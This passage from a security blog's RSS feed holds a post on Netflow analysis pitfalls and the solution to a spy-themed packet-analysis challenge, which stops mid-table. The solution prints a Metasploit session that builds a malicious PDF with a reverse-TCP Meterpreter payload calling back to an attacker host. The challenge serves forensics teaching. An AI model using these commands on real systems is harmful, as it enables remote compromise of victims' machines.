<p>TinySOHORouter, by comparison, is a trivial speck on the corporate network diagram. It has a single ADSL connection and performs the usual SOHO tasks of NAT, firewall, DSL dialup, etc. Both routers export Netflow data to a central collector.</p>
<p>As you ponder my da Vinci-like Visio skills, consider the following question. Which router will pose the greater <a href="http://www.cisco.com/en/US/products/ps6601/products_ios_protocol_group_home.html" target="_blank">Netflow</a> analysis challenge to the security team?</p>
<p><a href="http://wirewatcher.files.wordpress.com/2011/09/taleoftworouters1.png"><img class="aligncenter size-full wp-image-1398" title="TaleOfTwoRouters" src="http://wirewatcher.files.wordpress.com/2011/09/taleoftworouters1.png?w=450&#038;h=376" alt="" width="450" height="376" /></a><br />
You&#8217;ve probably guessed it by now &#8211; the troublesome router is TinySOHORouter. HugeCorpCoreRouter, whilst powerful and complex, has a relatively easy job when it comes to Netflow. TinySOHORouter however has three sticking points that could prove to be troublesome for a Netflow analyst. None of the following features are typically running on your average big beefy HugeCorpCoreRouter:</p>
<ol>
<li>The firewall process (or any kind of filtering ACL). HugeCorpCoreRouter is concerned with forwarding datagrams as fast as possible through the core &#8211; firewall operarions do not live here</li>
<li>The NAT process</li>
<li>The dialer interface associated with the ADSL connection</li>
</ol>
<p>Let&#8217;s look at each of these in turn.</p>
<p><a href="http://www.justgiving.com/alecwaters"><img class=" alignright" style="border-color:initial;border-style:initial;" title="Sponsor Alec!" src="http://www.justgiving.com/App_Themes/JustGiving/images/badges/badge9.gif" alt="Sponsor Alec!" width="120" height="90" /></a><br />
<em>I&#8217;m running the <a href="http://brightonhalfmarathon.com/" target="_blank">Brighton Half Marathon</a> in aid of <a href="http://www.helpforheroes.org.uk/" target="_blank">Help for Heroes</a> &#8211; please sponsor me if you can by clicking the link to the right:</em></p>
<h2>The firewall process</h2>
<p>Netflow is, by default, an ingress-based technology, which means that the router&#8217;s flow cache is updated when datagrams are received by an interface. However, a datagram doesn&#8217;t have to enter <em>and</em> leave the router to leave an impression in the flow cache. This manifests itself in an interesting way when a firewall is sticking its oar in.</p>
<p>The <a href="http://www.cisco.com/en/US/docs/net_mgmt/netflow_collection_engine/3.6/user/guide/format.html#wp1006186" target="_blank">Netflow v5 flow record format</a> has fields that describe the SNMP interface indexes of the input and output interfaces for any given flow. This is useful, because it means that your Netflow analysis tools can tell you that when 10.11.12.13 spoke to the webserver on 192.168.0.1, the traffic from 10.11.12.13 entered the router on FastEthernet4/23 and left it on GigabitEthernet0/2. This also makes it possible to draw pretty per-interface graphs of Netflow traffic. (BTW, you&#8217;ll want to use the &#8220;snmp-server ifindex persist&#8221; command otherwise the SNMP interface indexes could change when the router reloads, which can really confuse analysis!)</p>
<p>But what if there were an ACL in place that drops all traffic to port 80 on 192.168.0.1? Dropped datagrams are one of the byproducts of any kind of firewall or ACL &#8211; how does Netflow handle those?</p>
<p>Let&#8217;s say a datagram from 10.11.12.13 is received, destined for 192.168.0.1:80. As this destination is denied by an ACL, the router duly drops it. Netflow, being an ingress technology, will still put an entry into the flow cache to describe the flow, despite the fact that the datagram was dropped by an ACL (even if the ACL is applied in the inbound direction on the receiving interface). There is no output interface for the flow in this case, so what does the router put into the flow record to denote this?</p>
<p>Flows that are either a) dropped by the router or b) destined for the router itself (SSH sessions, for example) will have zero in the output interface field, to show that the flow entered the router but did not leave.</p>
<p>So why is this a problem for the analyst?</p>
<p>Let&#8217;s say I run a report that shows all destination ports for destination IP address 192.168.0.1 (in a naive attempt to find out &#8220;what services have people been using on my server?&#8221;). Much to my surprise, port 80 features prominently. Why&#8217;s it in the report? Isn&#8217;t it blocked by an ACL? Have we been hacked? Has the APT Bogeyman paid us a visit?</p>
<p>Fortunately, we&#8217;re safe. Port 80 features because 10.11.12.13 <em>tried</em> to talk to it, causing a flow to be logged despite the fact that the ACL dropped the traffic. If you were to re-run the report asking for the number of <em>bytes</em> transferred between 10.11.12.13 and 192.168.0.1:80, we&#8217;d see 40 bytes in the client-&gt;server direction (the size of an IP datagram with a TCP SYN in it) and zero bytes in the server-&gt;client direction, which describes the ACL drop nicely.</p>
<p>Keep this in mind when designing reports based on Netflow data. Certain products like <a href="http://www.manageengine.com/products/netflow/" target="_blank">Netflow Analyser</a> are able to <a title="Suppress Access Control List related drops" href="http://www.manageengine.com/it360/help/meitms/traffic/help/admin-operations/advanced-settings.html" target="_blank">take this behaviour into account</a> to a certain degree (&#8220;Suppress Access Control List related drops&#8221;). Alternatively, you could use the <a href="http://www.cisco.com/en/US/technologies/tk648/tk362/technologies_white_paper09186a00800a3db9.html" target="_blank">Netflow v9 flow record format</a> if your router and analysis tools support it. There is a useful field called &#8220;FORWARDING STATUS&#8221; which tells you if a flow was forwarded, dropped or consumed, allowing the analyst to differentiate between traffic dropped by the router and traffic destined for the router. Very handy.</p>
<h2>The NAT process</h2>
<p>Our second bugbear can also cause problems, especially if we want to ask questions like &#8220;show me all the traffic destined for the single PC behind TinySOHORouter&#8221; &#8211; the report in this case will be totally blank, even if the PC has been hitting Facebook all day long. But why?</p>
<p>Take the simple case of an HTTP flow between our single PC at 10.11.12.13 (a private IP address on a router&#8217;s FastEthernet0 interface) and 123.123.123.123 (a public webserver on the Internet via FastEthernet1). On its way out of the router, the private 10.11.12.13 gets NATted into 111.111.111.111, the IP address of FastEthernet1.</p>
<p>From Netflow&#8217;s point of view, it goes like this:</p>
<ul>
<li>A TCP segment from 10.11.12.13 destined for 123.123.123.123 is received on Fa0. <strong>An entry in the Netflow cache accounts for this.</strong></li>
<li>The router decides that the traffic should be sent out via Fa1, and does a source IP address NAT translation from 10.11.12.13 to 111.111.111.111 before it sends it on its way.</li>
<li>The TCP response is eventually received on Fa1 from 123.123.123.123 destined for 111.111.111.111, which is 10.11.12.13&#8242;s &#8220;outside&#8221; address. <strong>An entry in the Netflow cache accounts for this.</strong></li>
<li>The NAT translation from 111.111.111.111 to 10.11.12.13 takes place, and the TCP response is sent out of Fa0.</li>
</ul>
<p>Therefore, all of the returning traffic will be shown as destined for 111.111.111.111 and never 10.11.12.13 &#8211; this is because input accounting (including Netflow) occurs on the router before the NAT outside-to-inside translation takes place:</p>
<p><a href="http://www.cisco.com/en/US/tech/tk648/tk361/technologies_tech_note09186a0080133ddd.shtml" target="_blank">http://www.cisco.com/en/US/tech/tk648/tk361/technologies_tech_note09186a0080133ddd.shtml</a></p>
<p>There are three ways to either get around or assist with this problem:</p>
<ol>
<li>If your router and Netflow collector support it, disable ingress Netflow accounting on Fa1 and enable both ingress and <a href="http://www.cisco.com/en/US/docs/ios/12_3t/12_3t11/feature/guide/nflowegr.html" target="_blank">egress Netflow accounting</a> on Fa0 (the inside interface). This means that all flows will be accounted for on the &#8220;inside&#8221; of the NAT process. Take care, though &#8211; by doing this we are causing Netflow to &#8220;ignore&#8221; all traffic that does not cross Fa0. This may or may not be a problem, depending on your topology and requirements. Also, think very carefully about this approach if your router has many layer 3 interfaces. If ingress and egress Netflow were to be enabled on both Fa0 and Fa1, there&#8217;s a chance your Netflow collector could see duplicated flows.</li>
<li>If your router and Netflow collector support it, you can use the &#8220;ip nat log translations flow-export&#8221; command. This will log all NAT translations in a flow template that looks like this:
<pre>templateId=259: id=259, fields=11
    field id=8 (ipv4 source address), offset=0, len=4
    field id=225 (natInsideGlobalAddress), offset=4, len=4
    field id=12 (ipv4 destination address), offset=8, len=4
    field id=226 (natOutsideGlobalAddress), offset=12, len=4
    field id=7 (transport source-port), offset=16, len=2
    field id=227 (postNAPTSourceTransportPort), offset=18, len=2
    field id=11 (transport destination-port), offset=20, len=2
    field id=228 (postNAPTDestinationTransportPort), offset=22, len=2
    field id=234 (ingressVRFID), offset=24, len=4
    field id=4 (ip protocol), offset=28, len=1
    field id=230 (natEvent), offset=29, len=1</pre>
<p>This will give you a log of all NAT translations that you can use to find out the actual destination for the traffic from 123.123.123.123 to 111.111.111.111. Your Netflow collector may even be smart enough to correlate this information onto other &#8220;standard&#8221; flow exports, which would be a very neat trick indeed.</li>
<li>If your router supports it, you can use the &#8220;ip nat log translations syslog&#8221; command. This will dump all NAT translations to syslog like this:
<pre>Sep 14 12:31:39.740 BST: %IPNAT-6-CREATED:
tcp 192.168.0.88:4021 212.74.31.235:4021
192.150.8.200:443 192.150.8.200:443
Sep 14 12:32:53.733 BST: %IPNAT-6-DELETED:
tcp 192.168.0.88:4021 212.74.31.235:4021
192.150.8.200:443 192.150.8.200:443</pre>
<p>Take care, though &#8211; this approach has the possibility to add significant load to your router, your syslog server, and your syslog analysis mechanisms &#8211; it becomes a manual task to correlate the NAT translations from syslog to the Netflow exports from your router.</li>
</ol>
<h2>The ADSL link&#8217;s dialer interface</h2>
<p>It varies with platform and configuration, but when using a DSL line with <a href="http://en.wikipedia.org/wiki/Pppoe" target="_blank">PPPoE</a>/<a href="http://en.wikipedia.org/wiki/Pppoa" target="_blank">PPPoA</a> a plethora of virtual interfaces get created by the router. Of these, only the following are really of interest:</p>
<p>interface ATM 0/0/0<br />
The physical ADSL interface</p>
<p>interface dialer 0<br />
The dialer interface created by the user in order to connect to the DSL provider</p>
<p>interface virtual-access XX<br />
A virtual interface created by the router, cloned from and bound to interface dialer0</p>
<p>Of these, only the dialer and virtual-access interfaces are layer 3 interfaces that can participate in Netflow, and of these the user only has direct control over the configuration of the dialer interface. So we just enable Netflow on TinySOHORouter&#8217;s dialer0 and inside ethernet interfaces and we&#8217;re done, right?</p>
<p>Not quite.</p>
<p>If you were to use your Netflow analysis tools to look at an interface graph for dialer0, all you will see is <em>outbound</em> traffic. You&#8217;ll also notice that the virtual-access interface has popped up as well, showing only <em>inbound</em> traffic. No one interface has the complete picture.</p>
<p>This is, interestingly enough, the expected behaviour. Traffic from the ethernet network leaves the router via dialer0 because that&#8217;s what the default route says to do (&#8220;ip route 0.0.0.0 0.0.0.0 dialer0&#8243;). Therefore, when the ethernet interface receives a datagram destined for the Internet, Netflow will put the SNMP interface index of dialer0 into the flow cache. However, the router doesn&#8217;t actually use dialer0 to send or receive traffic, it uses the virtual-access interface cloned from it. This means that when datagrams are received from the Internet, they enter the router on virtual-accessXX instead of dialer0 or any of the other associated interfaces. This is why the dialer shows only outbound traffic and the virtual-access shows only inbound. All very logical and intuitive, I&#8217;m sure you&#8217;ll agree&#8230;</p>
<p>How to get around this? Either just &#8220;keep in it mind&#8221; when performing analysis, or hope that your Netflow analysis tools have some way to cater for it by plotting the outbound traffic on dialer0 and the inbound traffic on virtual-accessXX on the same graph.</p>
<p>Those are all the Netflow analysis &#8220;gotchas&#8221; that spring to mind &#8211; can anyone think of any others?</p>
<p><img class="alignleft size-full wp-image-841" title="hr" src="http://wirewatcher.files.wordpress.com/2010/05/hr.png?w=450" alt=""   /><br />
<a href="http://www.dataline.co.uk/wirewatcher" target="_blank"><img class="alignleft size-full wp-image-844" title="Dataline" src="http://wirewatcher.files.wordpress.com/2010/05/dl.gif?w=450" alt=""   /></a>Alec Waters is responsible for all things security at <a href="http://www.dataline.co.uk/wirewatcher" target="_blank">Dataline Software</a>, and can be emailed at alec.waters@dataline.co.uk<br />
<img class="alignleft size-full wp-image-841" title="hr" src="http://wirewatcher.files.wordpress.com/2010/05/hr.png?w=450" alt=""   /></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wirewatcher.wordpress.com/1394/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wirewatcher.wordpress.com/1394/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wirewatcher.wordpress.com/1394/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wirewatcher.wordpress.com/1394/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wirewatcher.wordpress.com/1394/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wirewatcher.wordpress.com/1394/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wirewatcher.wordpress.com/1394/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wirewatcher.wordpress.com/1394/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wirewatcher.wordpress.com/1394/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wirewatcher.wordpress.com/1394/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wirewatcher.wordpress.com/1394/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wirewatcher.wordpress.com/1394/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wirewatcher.wordpress.com/1394/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wirewatcher.wordpress.com/1394/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wirewatcher.wordpress.com&amp;blog=7642208&amp;post=1394&amp;subd=wirewatcher&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wirewatcher.wordpress.com/2011/09/14/a-tale-of-two-routers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/5efdd6f003184226545199f69c4d5b10?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">alecwaters</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2011/09/taleoftworouters1.png" medium="image">
			<media:title type="html">TaleOfTwoRouters</media:title>
		</media:content>

		<media:content url="http://www.justgiving.com/App_Themes/JustGiving/images/badges/badge9.gif" medium="image">
			<media:title type="html">Sponsor Alec!</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/hr.png" medium="image">
			<media:title type="html">hr</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/dl.gif" medium="image">
			<media:title type="html">Dataline</media:title>
		</media:content>

		<media:content url="http://wirewatcher.files.wordpress.com/2010/05/hr.png" medium="image">
			<media:title type="html">hr</media:title>
		</media:content>
	</item>
		<item>
		<title>The Spy Hunter, Part II &#8211; Solution</title>
		<link>http://wirewatcher.wordpress.com/2011/08/14/the-spy-hunter-part-ii-solution/</link>
		<comments>http://wirewatcher.wordpress.com/2011/08/14/the-spy-hunter-part-ii-solution/#comments</comments>
		<pubDate>Sun, 14 Aug 2011 20:54:34 +0000</pubDate>
		<dc:creator>Alec Waters</dc:creator>
				<category><![CDATA[Packet Challenge]]></category>
		<category><![CDATA[Spy Hunter]]></category>

		<guid isPermaLink="false">http://wirewatcher.wordpress.com/?p=1338</guid>
		<description><![CDATA[The Spy Hunter, Part II is here. There&#8217;s an epilogue to the story here which will make more sense once you&#8217;ve read this post! As with last time, we had a good number of entries to the challenge. It was a very close call, but the winner this time is Jeff Gibat! Well done Jeff; [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wirewatcher.wordpress.com&amp;blog=7642208&amp;post=1338&amp;subd=wirewatcher&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>The Spy Hunter, Part II is <a title="The Spy Hunter, Part II" href="http://wirewatcher.wordpress.com/2011/07/13/the-spy-hunter-part-ii/" target="_blank">here</a>. There&#8217;s an epilogue to the story <a title="The Spy Hunter, Part II – Epilogue" href="http://wirewatcher.wordpress.com/2011/08/10/the-spy-hunter-part-ii-epilogue/" target="_blank">here</a> which will make more sense once you&#8217;ve read this post!</p>
<p>As with <a title="The Spy Hunter – solution" href="http://wirewatcher.wordpress.com/2010/09/13/the-spy-hunter-solution/" target="_blank">last time</a>, we had a good number of entries to the challenge. It was a very close call, but the winner this time is <a href="https://twitter.com/#!/jgibat" target="_blank">Jeff Gibat</a>! Well done Jeff; honorable mentions also go to Sairon Istyar, Marcelo Mandolesi and John Douglas.</p>
<p>Before going over Jeff&#8217;s answers, I&#8217;ll first go over the process needed to dissect the <a href="http://j.mp/plQDNt" target="_blank">supplied pcap</a>. My aim for the challenge was to require quite a diverse skillset in order to root out all the answers, including:</p>
<ul>
<li>pcap analysis</li>
<li>IE cache forensics</li>
<li>Malware reverse engineering</li>
<li>Audio steganography</li>
<li>Relational database analysis</li>
</ul>
<p>Opening the pcap in Wireshark and nosing around a little, we can see that we&#8217;re dealing with a stream of TFTP traffic between two hosts, 192.168.93.3 and 192.168.88.56:</p>
<p><a href="http://wirewatcher.files.wordpress.com/2011/08/operationneptune1.png"><img class="aligncenter size-full wp-image-1356" title="OperationNEPTUNE1" src="http://wirewatcher.files.wordpress.com/2011/08/operationneptune1.png?w=450&#038;h=412" alt="" width="450" height="412" /></a>If we apply a display filter of &#8220;tftp.opcode == 2&#8243; (&#8220;Write Request&#8221;), we can see that three files have been transferred, namely:</p>
<ul>
<li>ARTIST_-_Spectrogram_-_TRACK_-_Secrets.wav</li>
<li>SHOPPINGLIST.7z</li>
<li>IECache.7z</li>
</ul>
<p><a href="http://wirewatcher.files.wordpress.com/2011/08/operationneptune2.png"><img class="aligncenter size-full wp-image-1357" title="OperationNEPTUNE2" src="http://wirewatcher.files.wordpress.com/2011/08/operationneptune2.png?w=450&#038;h=412" alt="" width="450" height="412" /></a>The trick now is to extract these three from the capture. Wireshark doesn&#8217;t seem to be great at this, but there are several other tools which are including <a href="http://www.netresec.com/?page=NetworkMiner" target="_blank">NetworkMiner</a>, <a href="http://wiki.xplico.org/doku.php?id=web_interface#ftp_and_tftp" target="_blank">Xplico</a> and <a href="http://pseudo-flaw.net/content/tftpgrab/" target="_blank">TFTPgrab</a>. Extra points to John Douglas who went above and beyond the call of duty and wrote his own parser to carve the three files out.</p>
<p>Loading the capture into NetworkMiner shows the three files it has extracted on the &#8220;Files&#8221; tab. Note that the wav file has had its filename truncated to twenty characters, which is a shame because the filename is a clue!</p>
<p><a href="http://wirewatcher.files.wordpress.com/2011/08/operationneptune3.png"><img class="aligncenter size-full wp-image-1358" title="OperationNEPTUNE3" src="http://wirewatcher.files.wordpress.com/2011/08/operationneptune3.png?w=450&#038;h=339" alt="" width="450" height="339" /></a></p>
<p>NetworkMiner will conveniently save these files for you in subdirectories under the AssembledFiles directory. Let&#8217;s examine the three in turn:</p>
<ul>
<li>ARTIST_-_Spectrogram_-_TRACK_-_Secrets.wav<br />
This is a well formed wav file, but when you play it it&#8217;s not exactly tuneful.</li>
<li>SHOPPINGLIST.7z<br />
This is a well formed 7z archive, but it&#8217;s password protected.</li>
<li>IECache.7z<br />
Again, this one is a well formed 7z archive, but there&#8217;s no password protection here.</li>
</ul>
<p>The third file is the low-hanging fruit at this point, so we&#8217;ll tackle it first. As hinted by the filename, it does indeed contain an IE Cache directory (mercifully quite a small one!). There are any number of tools for performing cache forensics; <a href="http://www.nirsoft.net/utils/ie_cache_viewer.html" target="_blank">IECacheView</a> is one of them. By clicking Select Cache Folder from the File menu and specifying the directory where you unzipped the .7z file we can take a look:</p>
<p><a href="http://wirewatcher.files.wordpress.com/2011/08/operationneptune4.png"><img class="aligncenter size-full wp-image-1361" title="OperationNEPTUNE4" src="http://wirewatcher.files.wordpress.com/2011/08/operationneptune4.png?w=450&#038;h=313" alt="" width="450" height="313" /></a>The cache directory shows someone logging into a webmail interface at mail.email4espionage.spy. Two messages are read, the first of which looks like this:</p>
<p><code>Return-Path: dave.nice@email4espionage.spy<br />
Received: from email4espionage.spy ([127.0.0.1])<br />
by mail.email4espionage.spy<br />
; Fri, 8 Jul 2011 21:41:20 +0100<br />
MIME-Version: 1.0<br />
X-Mailer: MailBee.NET 6.0.2.220<br />
X-Priority: 3 (Normal)<br />
From: "Dave Nice" &lt;dave.nice@email4espionage.spy&gt;<br />
To: roberto.tablato@email4espionage.spy,<br />
kerry.nitpick@email4espionage.spy,<br />
guatrau@email4espionage.spy,<br />
steve.austen@email4espionage.spy,<br />
pete.michaels@roseandcrown.pub<br />
Cc: dave.nice@email4espionage.spy<br />
Subject: Re: SIBHOD and friends team day out<br />
Date: Fri, 08 Jul 2011 21:41:20 +0100<br />
X-Originating-IP: 127.0.0.1<br />
Message-ID: &lt;2.6b59ee93be36ce1bad15@SIBHOD-1&gt;<br />
Content-Type: text/plain;<br />
charset="utf-8"<br />
Content-Transfer-Encoding: quoted-printable</code></p>
<p><code>Hi all,<br />
The final list of attendees will be:<br />
* Myself<br />
* Bobby (NOT Suzy!)<br />
* Kerry<br />
* Pete<br />
* Garry<br />
Steve's not coming of course, and the Guatrau says he'll meet us at the BATCAVE for beers afterwards.</code></p>
<p><code>Venue:<br />
HAPPYLAND; meet on Saturday 16th at BLACK TWO at 1430. Garry's got us great seats for Kung Fu Panda 2! He also says that a COWABUNGA is in effect at SODIUM - let's eat first, and we can watch the film with plunder in hands!</code></p>
<p><code>The boring bit:<br />
Following standard SIBHOD procedure, I am issuing a tentative UTOPIA to everyone for the duration of the outing. Please act like it - do not group up before reaching BLACK TWO. Sit in groups of no more than two at SODIUM.</code></p>
<p><code>The fun bit:<br />
Come in fancy dress as one of the Furious Five. There will be a prize for the best outfit. I call Po!<br />
</code><br />
<code>See you next Saturday,<br />
Dave</code></p>
<p>OK, sounds like a fun day out, and we&#8217;ve got some names, places and cryptic codewords to chew over as we go on.</p>
<p>The next email looks like notification of a Twitter DM:</p>
<p><a href="http://wirewatcher.files.wordpress.com/2011/08/operationneptune5.png"><img class="aligncenter size-full wp-image-1363" title="OperationNEPTUNE5" src="http://wirewatcher.files.wordpress.com/2011/08/operationneptune5.png?w=450&#038;h=296" alt="" width="450" height="296" /></a>This looks like the phishing message sent by Yellow Sun from @HomerHicks to @UltraVenona, bearing the recognition code &#8220;scelidosaurus&#8221; provided by Donald Burgess and the link provided by Keith Starr. The person whose IE cache we&#8217;re going through could therefore be @UltraVenona himself!</p>
<p>The  IE cache also shows that the link above was indeed clicked as Yellow Sun hoped it might be, and a file called TNM-Defect-943024.pdf was downloaded &#8211; this is <a href="http://www.virustotal.com/file-scan/report.html?id=5d5e42f86a50bf99364781cffe5280428cc115f2631f8828b959f9628fbd8f2f-1313161030" target="_blank">the exploit supplied by Starr</a> to compromise @UltraVenona&#8217;s machine. By analysing this file, we can determine what Starr&#8217;s intent was, but the short answer is that it&#8217;s a standard MetaSploit exploit:</p>
<p><code> =[ metasploit v4.0.1-dev [core:4.0 api:1.0]<br />
+ -- --=[ 721 exploits - 367 auxiliary - 74 post<br />
+ -- --=[ 226 payloads - 27 encoders - 8 nops<br />
=[ svn r13543 updated today (2011.08.12)</code></p>
<p><code><span style="text-decoration:underline;">msf</span> &gt; use exploit/windows/fileformat/adobe_cooltype_sing<br />
<span style="text-decoration:underline;">msf</span> exploit(adobe_cooltype_sing) &gt; set PAYLOAD windows/meterpreter/reverse_tcp<br />
PAYLOAD =&gt; windows/meterpreter/reverse_tcp<br />
<span style="text-decoration:underline;">msf</span> exploit(adobe_cooltype_sing) &gt; set LHOST 192.168.93.2<br />
LHOST =&gt; 192.168.93.2<br />
<span style="text-decoration:underline;">msf</span> exploit(adobe_cooltype_sing) &gt; set LPORT 4444<br />
LPORT =&gt; 4444<br />
<span style="text-decoration:underline;">msf</span> exploit(adobe_cooltype_sing) &gt; set FILENAME<br />
TNM-Defect-943024.pdf<br />
FILENAME =&gt; TNM-Defect-943024.pdf<br />
<span style="text-decoration:underline;">msf</span> exploit(adobe_cooltype_sing) &gt; exploit<br />
</code><br />
<code>[*] Creating 'TNM-Defect-943024.pdf' file...<br />
[*] Generated output file /home/user/.msf4/data/exploits/TNM-Defect-943024.pdf</code></p>
<p>When @UltraVenona opened this file with his vulnerable PDF reader, Keith Starr got a Meterpreter shell on @UltraVenona&#8217;s machine. The Yellow Sun strikeback is looking pretty good at this point!</p>
<p>Having dug about as deeply as possible into the IE cache it&#8217;s time to turn our attention to the other two files, the tuneless wav and the password protected SHOPPINGLIST.7z. Having to brute-force the password for the 7z isn&#8217;t really in the spirit of a packet challenge, so perhaps the password is present in the evidence somewhere. Let&#8217;s see where analysing the wav file gets us.</p>
<p>As I mentioned, there&#8217;s a clue in the filename of the wav file, which is present in full in the pcap &#8211; ARTIST_-_Spectrogram_-_TRACK_-_Secrets.wav. I&#8217;m sure that Spectrogram are indeed the Greatest Band The World Has Ever Known, but a spectrogram is also a <a href="http://en.wikipedia.org/wiki/Spectrogram" target="_blank">visualisation of an audio signal</a>. Several tools are available to render spectrograms of audio files, such as Spectrogram 5 which you can download <a href="http://www.electronics-lab.com/downloads/pc/003/" target="_blank">here</a>. Run it up, select Analyze File from the File menu, and load up our wav file. You&#8217;ll be treated to the view below:</p>
<p><a href="http://wirewatcher.files.wordpress.com/2011/07/spectrogram.png"><img class="aligncenter size-full wp-image-1335" title="Spectrogram" src="http://wirewatcher.files.wordpress.com/2011/07/spectrogram.png?w=450&#038;h=318" alt="" width="450" height="318" /></a>Our little visualisation has revealed some text! Perhaps &#8220;IamJamesBond&#8221; is the passphrase to SHOPPINGLIST.7z? We&#8217;ll find that out in a minute &#8211; for now, here&#8217;s a quick explanation of how I created the wav.</p>
<p>First, I created a white on black image file containing the phrase IamJamesBond. Then I loaded it into <a href="http://hem.passagen.se/rasmuse/Coagula.htm" target="_blank">Coagula</a> with Open Image from the file menu:<a href="http://wirewatcher.files.wordpress.com/2011/07/coagula.png"><img class="aligncenter size-full wp-image-1336" title="Coagula" src="http://wirewatcher.files.wordpress.com/2011/07/coagula.png?w=450&#038;h=406" alt="" width="450" height="406" /></a></p>
<p>Now select &#8220;Render without blue&#8221; from the Sound menu, and finally &#8220;Save Sound As&#8221; from the File menu. Load the resulting wav file into Spectrogram to see the goodness.</p>
<p>Right, back to the plot. Does IamJamesBond open up SHOPPINGLIST.7z? Why yes, it does! There&#8217;s only one file in the archive, called SHOPPINGLIST.db. Sounds like a database file, but what type?</p>
<p><code>morpheus:~# file SHOPPINGLIST.db<br />
SHOPPINGLIST.db: SQLite 3.x database</code></p>
<p>There are many tools available for analysing SQLite databases, and <a href="http://www.sqlmaestro.com/products/sqlite/maestro/" target="_blank">SQLite Maestro</a> is a very nice one. The first thing we need to do with any unknown database is determine its structure, in terms of tables, columns and <a href="http://en.wikipedia.org/wiki/Foreign_key" target="_blank">foreign key</a> relationships. SQLite Maestro makes this quite straightforward &#8211; select Designer from the Tools menu, then hit &#8220;Reverse Engineering&#8221; under General. You will be rewarded with a schema diagram a little like this:</p>
<p><a href="http://wirewatcher.files.wordpress.com/2011/08/operationneptune6.jpeg"><img class="aligncenter size-full wp-image-1375" title="OperationNEPTUNE6" src="http://wirewatcher.files.wordpress.com/2011/08/operationneptune6.jpeg?w=450&#038;h=409" alt="" width="450" height="409" /></a>I tried to make the database as meaningful and realistic as possible in terms of structure and foreign key naming conventions. There are straightforward one-to-many joins, like the one between the Person and the Photo table, which represent relationships like &#8220;one person may have many photos&#8221;. There are also self-referential foreign keys which reference the same table rather than another one, e.g. Person.Reports_To is a foreign key onto Person.ID &#8211; this represents the organisation&#8217;s hierarchy. The AgentPlacement and Employment tables facilitate many-to-many joins, representing, for example, the fact that a single agent can be placed in many organisations and also that a single organisation may have many agents in it. Have a nose around, especially in the Codewords table, and hopefully things will all make sense (including why the database itself is called SHOPPINGLIST!).</p>
<p>The bulk of the mission objectives can be fulfilled with careful analysis of the database, so without further ado we&#8217;ll move on to Jeff&#8217;s answer. Where Jeff has expanded out a codeword I will supply the original, and I will also give appropriate SQL statements to back up Jeff&#8217;s answers. I&#8217;ll use italics to differentiate.</p>
<p>Over to Jeff:</p>
<h3>Determine how Starr took over UltraVenona&#8217;s computer. What exploit and delivery mechanism did he use?</h3>
<ul>
<li>Delivery mechanism: PDF</li>
<li>Exploit: javascript heap overflow in PDF. More info to come. I used Didier Steven’s <a href="http://blog.didierstevens.com/2009/03/31/pdfid/" target="_blank">pdfid</a> and <a href="http://blog.didierstevens.com/programs/pdf-tools/" target="_blank">pdf-parser</a> to extract the javascript. The Javascript which is called when the document is opened creates a large array in memory of what probably contains nop sleds and shellcode repeated. There was no exec() or other function call from the javascript so my initial hunch is that by allocating such a large amount of memory, it crashes the reader application and control finds its way to the shellcode.</li>
</ul>
<h3>Determine the name of the Adversary organisation. Are they a foreign intelligence service, or some other kind of organisation?</h3>
<p>The Sinister Icy Black Hand of Death (greatest covert intelligence agency the world has ever seen) <em>(Look in the Organisation table)</em></p>
<h3>Determine if Yellow Sun is the Adversary&#8217;s only target, or if there are others</h3>
<p>Other target: NybbleComms <em>(Look in the Organisation table)</em></p>
<h3>Determine the names and aliases of the agents employed by the Adversary, plus the Adversary’s organisational hierarchy</h3>
<table border="1" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td valign="top" width="213"><strong>Name</strong></td>
<td valign="top" width="213"><strong>Alias_Name</strong></td>
<td valign="top" width="213"><strong>Notes</strong></td>
</tr>
<tr>
<td valign="top" width="213">Dave Nice</td>
<td valign="top" width="213">Ultra Venona</td>
<td valign="top" width="213">Assigned by SIBHOD</td>
</tr>
<tr>
<td valign="top" width="213">Donald Burgess</td>
<td valign="top" width="213">Homer Hicks</td>
<td valign="top" width="213">Assigned by SIBHOD</td>
</tr>
<tr>
<td valign="top" width="213">Kerry Nitpick</td>
<td valign="top" width="213">Arnold Davies</td>
<td valign="top" width="213">Assigned by SIBHOD</td>
</tr>
<tr>
<td valign="top" width="213">Kerry Nitpick</td>
<td valign="top" width="213">Keith Starr</td>
<td valign="top" width="213">Known alias, used for non-SIBHOD business</td>
</tr>
<tr>
<td valign="top" width="213">Kerry Nitpick</td>
<td valign="top" width="213">Rock Studman</td>
<td valign="top" width="213">Self-defined nickname used in futile attempts to impress the ladies</td>
</tr>
<tr>
<td valign="top" width="213">Kerry Nitpick</td>
<td valign="top" width="213">Scorpion</td>
<td valign="top" width="213">Assigned by SIBHOD</td>
</tr>
<tr>
<td valign="top" width="213">Pete Michaels</td>
<td valign="top" width="213">Argus</td>
<td valign="top" width="213">Assigned by SIBHOD</td>
</tr>
<tr>
